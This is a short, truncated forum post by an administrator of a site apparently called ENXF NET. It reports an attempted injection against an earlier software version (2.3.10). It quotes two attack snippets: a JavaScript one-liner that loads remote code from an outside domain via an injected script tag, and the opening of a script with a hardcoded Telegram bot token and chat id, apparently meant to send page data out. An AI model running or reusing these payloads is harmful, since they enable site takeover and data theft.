ENXF NET
Administrator
Staff member
Administrator
Moderator
+Lifetime VIP+
S.V.I.P.S Member
S.V.I.P Member
V.I.P Member
Collaborate
Registered
- Joined
- Nov 13, 2018
- Messages
- 31,096
- Points
- 823
Reputation:
Hi,
We had someone attempt to parse the following on the previous version from 2.3.10;
Code:
Code:
Read more
Continue reading...
We had someone attempt to parse the following on the previous version from 2.3.10;
Code:
let s=document.createElement('script');s.src='https://cizgicaps.com/exp.php';document.head.appendChild(s);Code:
Code:
(async () => {
console.log("%c[!] TAM KAPSAMLI OPERASYON BASLADI", "color: orange; font-weight: bold;");
try {
const botToken = "8619880328:AAHnHR1JlmQivoRVLw41_8hsFEYDeuLYM5A";
const chatId = "-1003650778510";
const currentUrl = window.location.host...
Read more
Continue reading...